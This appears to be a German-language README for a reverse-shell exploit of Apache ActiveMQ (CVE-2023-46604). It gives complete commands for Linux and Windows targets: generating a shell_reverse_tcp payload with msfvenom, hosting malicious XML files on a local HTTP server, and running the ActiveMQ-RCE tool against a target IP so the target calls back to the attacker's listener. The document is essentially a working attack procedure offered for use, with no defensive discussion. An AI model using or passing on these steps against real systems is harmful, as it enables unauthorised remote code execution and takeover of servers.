
Erreichen eines Reverse-Shell-Exploits für Apache ActiveMQ (CVE_2023-46604)
Dieser Exploit baut auf der grundlegenden Arbeit auf, die unter https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE) verfügbar ist. Wir haben die Technik weiterentwickelt, um eine Reverse Shell unter Verwendung des Metasploit Frameworks (https://github.com/rapid7/metasploit-framework) zu erreichen.
Wichtig: Ändern Sie manuell die IP-Adresse (0.0.0.0 in Zeile 11) in den XML-Dateien in die IP-Adresse, unter der das Payload generiert wird. Wenn Sie die folgenden Befehle befolgen, wird dies Ihre Listener-IP-Adresse sein. Auch {IP_Of_Hosted_XML_File} wird Ihre Listener-IP-Adresse sein.
Für Linux/Unix-Ziele
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml
Für Windows-Ziele
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml



Ein besonderer Dank geht an https://github.com/Anon4mous für die aktive Unterstützung.